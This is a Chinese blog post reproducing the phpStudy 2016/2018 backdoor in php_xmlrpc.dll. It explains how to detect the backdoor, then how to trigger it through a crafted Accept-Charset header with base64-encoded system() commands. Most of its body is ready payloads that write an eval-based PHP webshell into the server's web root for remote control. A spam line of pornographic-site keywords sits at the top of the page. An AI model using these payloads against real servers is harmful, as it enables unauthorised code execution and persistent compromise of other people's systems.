日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

phpstudy后门漏洞复现

發布時間:2023/12/31 php 37 豆豆
生活随笔 收集整理的這篇文章主要介紹了 phpstudy后门漏洞复现 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

筆記

前言

如果服務器是用phpstudy2016或phpstudy2018搭建的,那么就有可能存在后門

發現漏洞

后門代碼在phpStudy2016和phpStudy2018的php-5.2.17或php-5.4.45的\ext\php_xmlrpc.dll文件中
只要該文件中可以搜索到@eval(%s(‘%s’)),即證明漏洞存在
phpStudy2016路徑

php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018路徑

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

后門利用

(1)訪問目標服務器url時,用bp抓包
(2)找到accept-encoding: gzip, deflate,把逗號后面的空格刪掉,改為accept-encoding: gzip,deflate,然后在accept-encoding: gzip,deflate這行前面或后面加上一行accept-charset:c3lzdGVtKCdkaXInKTs=,然后發送(這里的c3lzdGVtKCdkaXInKTs=是經過base64加密的)

這里以windows舉例:
此時可以向目標服務器寫入一句話
(1)dir:查看當前目錄下的內容,可以一層層查看,最后找到WWW目錄所在,將一句話寫入
(2)chdir:查看當前所在目錄,類似于linux中的pwd
(3)利用bp向目標系統指定位置寫一句話木馬,^表示寫入特殊字符,例如<或>。寫入后xx.php內容為:<?php @eval($_REQUEST[peak);?>
payload:

echo ^<?php @eval($_REQUEST[cmd]);?^> > xx.php

(4)利用bp向目標系統指定位置寫一句話木馬,這個不同的是,沒有用到^,寫入后xx.php內容為"<?php @eval($_REQUEST[cmd]);?>",但有"也可使用蟻劍連接
payload:

echo "<?php @eval($_REQUEST[cmd]);?>" > xx.php 注: echo '<?php @eval($_REQUEST[cmd]);?>' > xx.php,也可,寫入后為<?php @eval($_REQUEST[cmd]);?>

(5)假設目標服務器使用的是phpstudy2018,最后那么payload就是

system('echo ^<?php @eval($_REQUEST[cmd]);?^> > C:\phpStudy\PHPTutorial\WWW\xx.php'); 或 system('echo "<?php @eval($_REQUEST[cmd]);?>" > C:\phpStudy\PHPTutorial\WWW\xx.php');

注:下面寫法會報錯,主要由于""中的變量會執行,上面可以是因為system里的整體是’’,表示該整體是字符串
所以system執行時,最好使用’’,包含php的代碼的也最好是’'包括

system("echo '<?php @eval($_REQUEST[cmd]);?>' > C:\phpStudy\PHPTutorial\WWW\xx.php");

而如果使用

system("echo \"<?php @eval($_REQUEST[cmd]);?>\" > C:\phpStudy\PHPTutorial\WWW\xx.php");

最后xx.php中為"<?php @eval();?>",也是""引起的問題

總結

以上是生活随笔為你收集整理的phpstudy后门漏洞复现的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。